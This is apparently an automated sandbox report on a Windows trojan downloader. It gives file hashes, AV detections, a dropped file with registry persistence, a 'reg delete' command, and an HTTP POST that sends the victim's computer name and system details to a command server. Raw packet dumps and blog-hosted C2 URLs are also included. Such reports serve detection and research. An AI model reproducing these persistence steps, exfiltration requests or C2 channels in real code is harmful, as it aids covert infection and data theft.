Analysis Date: 2014-01-28 02:00:24
MD5: 1bdc3222ec8c876eb93db25169a4dec5
SHA1: 45c659ae58e93a76ccbf719af874139e320d3013

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .xzYD md5: d41d8cd98f00b204e9800998ecf8427e sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 size: 0
Section .xzYD md5: 7fd1c91216ccb78fa46ea2cf84fb63dd sha1: b09b5e817e649d13d6a400d54e661c0ad7583b81 size: 21504
Section .xzYD md5: 36bba4742a400aa8fdf86bb81147490b sha1: 74e4d0bdcedeefaef2c08ab0cfceecd63533e756 size: 5632
Section .xzYD md5: 417846261dcffadab7aac4805305c55f sha1: 42335e6ab5f3d3f51c60d5394cd4609ebca4fdd3 size: 2560
Section .xzYD md5: 0e229d735bc6e15ddb9c9f80701a38ef sha1: 2c1b9547faaccad0d3ef488913cc032ef40ac944 size: 1024
Timestamp: 2013-05-10 13:13:04
Packer: UPX v0.80 - v0.84
PEhash: 36a92a0dbe81f030c7eeabfa7d7b6ff55b3c730c
AV (avira): TR/ATRAPS.Gen
AV (mcafee): Malware.ja
AV (avg): Win32/DH{IHk/JCJbAwAPOSUBNgo}
AV (msse): TrojanDownloader:Win32/Kanav

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Registry: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\5038539457536109\stubpath ➝
C:\Program Files\Common Files\Apple\Mobile Device Support\apple.exe\\x00
Creates File: C:\Program Files\Common Files\Apple\Mobile Device Support\apple.exe
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\1.bat
Creates Process: reg delete "HKEY_CURRENT_USER\Software\Microsoft\Active Setup\Installed Components\5038539457536109" /f
Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\1.bat
Winsock URL: http://lokias111234.blog.163.com/rss/
Winsock URL: http://opaoxf112.blog.163.com/rss/
Winsock URL: http://blog.daum.net/xml/rss/opaoxf2
Winsock URL: http://blog.chosun.com/rss/freebirdf1

Process
↳ reg delete "HKEY_CURRENT_USER\Software\Microsoft\Active Setup\Installed Components\5038539457536109" /f

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\1.bat

Network Details:

DNS: exeinfo1.org
Type: A
184.168.221.82
DNS: blog.chosun.com
Type: A
218.145.28.99
DNS: blog.daum.net
Type: A
180.70.134.40
DNS: blog.daum.net
Type: A
180.70.93.11
DNS: blog.163.com
Type: A
101.71.8.132
DNS: blog.163.com
Type: A
101.71.8.131
DNS: blog.163.com
Type: A
101.71.8.131
DNS: blog.163.com
Type: A
101.71.8.132
DNS: opaoxf112.blog.163.com
Type: A
DNS: lokias111234.blog.163.com
Type: A
HTTP POST: http://exeinfo1.org/pro1.asp
User-Agent:
HTTP GET: http://blog.chosun.com/rss/freebirdf1
User-Agent: Testing
HTTP GET: http://blog.daum.net/xml/rss/opaoxf2
User-Agent: Testing
HTTP GET: http://opaoxf112.blog.163.com/rss/
User-Agent: Testing
HTTP GET: http://lokias111234.blog.163.com/rss/
User-Agent: Testing
Flows TCP: 192.168.1.1:1031 ➝ 184.168.221.82:80
Flows TCP: 192.168.1.1:1032 ➝ 218.145.28.99:80
Flows TCP: 192.168.1.1:1033 ➝ 180.70.134.40:80
Flows TCP: 192.168.1.1:1034 ➝ 101.71.8.132:80
Flows TCP: 192.168.1.1:1035 ➝ 101.71.8.131:80

Raw Pcap
0x00000000 (00000)   504f5354 202f7072 6f312e61 73702048   POST /pro1.asp H
0x00000010 (00016)   5454502f 312e310d 0a486f73 743a6578   TTP/1.1..Host:ex
0x00000020 (00032)   65696e66 6f312e6f 72670d0a 436f6e74   einfo1.org..Cont
0x00000030 (00048)   656e742d 54797065 3a206170 706c6963   ent-Type: applic
0x00000040 (00064)   6174696f 6e2f782d 7777772d 666f726d   ation/x-www-form
0x00000050 (00080)   2d75726c 656e636f 6465640d 0a436f6e   -urlencoded..Con
0x00000060 (00096)   74656e74 2d4c656e 6774683a 3138370d   tent-Length:187.
0x00000070 (00112)   0a0d0a61 313d434f 4d505554 45522d58   ...a1=COMPUTER-X
0x00000080 (00128)   58585858 58266132 3d585858 58585858   XXXXX&a2=XXXXXXX
0x00000090 (00144)   58585858 58585858 58585858 58585858   XXXXXXXXXXXXXXXX
0x000000a0 (00160)   58666461 62383130 37343736 35366537   Xfdab810747656e7
0x000000b0 (00176)   35363936 65363534 39366537 34363536   5696e65496e74656
0x000000c0 (00192)   63266133 3d266134 3d4d6963 726f736f   c&a3=&a4=Microso
0x000000d0 (00208)   66742532 3057696e 646f7773 25323058   ft%20Windows%20X
0x000000e0 (00224)   50253230 50726f66 65737369 6f6e616c   P%20Professional
0x000000f0 (00240)   25323026 61363d3a 73766326 61373d34   %20&a6=:svc&a7=4
0x00000100 (00256)   35633635 39616535 38653933 61373663   5c659ae58e93a76c
0x00000110 (00272)   63626637 31396166 38373431 33396533   cbf719af874139e3
0x00000120 (00288)   32306433 3031332e 6578650d 0a0d0a     20d3013.exe....

0x00000000 (00000)   47455420 2f727373 2f667265 65626972   GET /rss/freebir
0x00000010 (00016)   64663120 48545450 2f312e31 0d0a5573   df1 HTTP/1.1..Us
0x00000020 (00032)   65722d41 67656e74 3a205465 7374696e   er-Agent: Testin
0x00000030 (00048)   670d0a48 6f73743a 20626c6f 672e6368   g..Host: blog.ch
0x00000040 (00064)   6f73756e 2e636f6d 0d0a4361 6368652d   osun.com..Cache-
0x00000050 (00080)   436f6e74 726f6c3a 206e6f2d 63616368   Control: no-cach
0x00000060 (00096)   650d0a0d 0a                           e....

0x00000000 (00000)   47455420 2f786d6c 2f727373 2f6f7061   GET /xml/rss/opa
0x00000010 (00016)   6f786632 20485454 502f312e 310d0a55   oxf2 HTTP/1.1..U
0x00000020 (00032)   7365722d 4167656e 743a2054 65737469   ser-Agent: Testi
0x00000030 (00048)   6e670d0a 486f7374 3a20626c 6f672e64   ng..Host: blog.d
0x00000040 (00064)   61756d2e 6e65740d 0a436163 68652d43   aum.net..Cache-C
0x00000050 (00080)   6f6e7472 6f6c3a20 6e6f2d63 61636865   ontrol: no-cache
0x00000060 (00096)   0d0a0d0a                              ....

0x00000000 (00000)   47455420 2f727373 2f204854 54502f31   GET /rss/ HTTP/1
0x00000010 (00016)   2e310d0a 55736572 2d416765 6e743a20   .1..User-Agent: 
0x00000020 (00032)   54657374 696e670d 0a486f73 743a206f   Testing..Host: o
0x00000030 (00048)   70616f78 66313132 2e626c6f 672e3136   paoxf112.blog.16
0x00000040 (00064)   332e636f 6d0d0a43 61636865 2d436f6e   3.com..Cache-Con
0x00000050 (00080)   74726f6c 3a206e6f 2d636163 68650d0a   trol: no-cache..
0x00000060 (00096)   0d0a                                  ..

0x00000000 (00000)   47455420 2f727373 2f204854 54502f31   GET /rss/ HTTP/1
0x00000010 (00016)   2e310d0a 55736572 2d416765 6e743a20   .1..User-Agent: 
0x00000020 (00032)   54657374 696e670d 0a486f73 743a206c   Testing..Host: l
0x00000030 (00048)   6f6b6961 73313131 3233342e 626c6f67   okias111234.blog
0x00000040 (00064)   2e313633 2e636f6d 0d0a4361 6368652d   .163.com..Cache-
0x00000050 (00080)   436f6e74 726f6c3a 206e6f2d 63616368   Control: no-cach
0x00000060 (00096)   650d0a0d 0a                           e....


Strings

3f333
fff3f
0123456789ABCDEF
04A2AF0B
0 4[_^][YY
1.baUaq.Y
1&<>P<
2"2&2*2.22262:2>2B2F2J2N2R2V2Z2^2b2f2j2n2r2v2z2~2
'3#0;9nd
#32770
3"3&3*3.32363:3>3B3F3J3N3R3V3Z3^3b3f3j3n3r3v3z3~3
35pur+virtu!3_l
35%R(BuXD
3C:\r >k
_3_m63
43224682503853979568992877482445
4"4&4*4.42464:4>4B4F4J4N4R4V4Z4^4b4f4j4n4r4v4z4~4
~4]7X[d
4MTLD<4,4M
4Up(90
5"5&5*5.52565:5>5B5F5J5N5R5V5Z5^5b5
-7?7A0
8pUAj#%
_, (8PX
'](%9;
_932.d>Gv
AB8cXPCXa
&&abYYSMD.
?AC98D
A"dtgN
ADVAPI32.dll
a/lock
argu(s_02f
asp HTT
A\T~fs
B'hw{u
B(lJm6/09OF3
Bo'm8e+
c+8F$o D
;+CFIS
>C"HKEY_CURRENT_USE
ckCouvI
 C`KL4
/;[?d]a
dd7#xb
DebugStr
del "%s"	z
du(Ty1C
/dvanck
dxAOEMCP	
ED	06DFJ
E.O,'_V
ErU0B=
essageBoxAws-
ExitProcess
f1j1n1r1v1z1~1
Fe t		
Fgk#jD
Files\CommT
FIp#s5
'Flush
fpq.ZY	W
GetAdaptersInfo
GetLaFA
GetProcAddress
__GLOBAL_HEAP_SELECTED
gXho,I
!h$67=
heap7'7no
H)%hp#
hPq?V,
http://w.nav
^I j K
iphlpapi.dll
?I"U4ZV*E?q.BqG
KAA28V.{gC
- Kablto iniVa
KERNEL32.DLL
,klwn>C
KOFTWA)
L	CloseHand
lErcmpiT
l)hT)FV_
LoadLibraryA
lUnw0dlP
L}Xt7J
me error
M!_*ex\/X
MSVCRT7run
mws_opeX1so
NamILCM|
nj6ByP
NU=t0L
{^opGre
o+YSTEM4Cu
+:'^\P,
p4Uv-	
pAll9g
p@gram 
PP"^r?
.PSm`~
q3x<u[Su%SN
qC|		B
%QFq:YY
[QsN;L
q|U`>Qy
RegCloseKey
{;S7sg_
spac#fv
?t:1t.(
t61I&D
!This program cannot be run in DOS mode.
ToedeC5
V700WP
v95c}R
VC20XCt
ViewOfX)
V+vP]s
wat7Ax
w{lowi8a
)w(nul
w+%=Pa
WS2_32.dll
!(WsU#<
Y=l9,7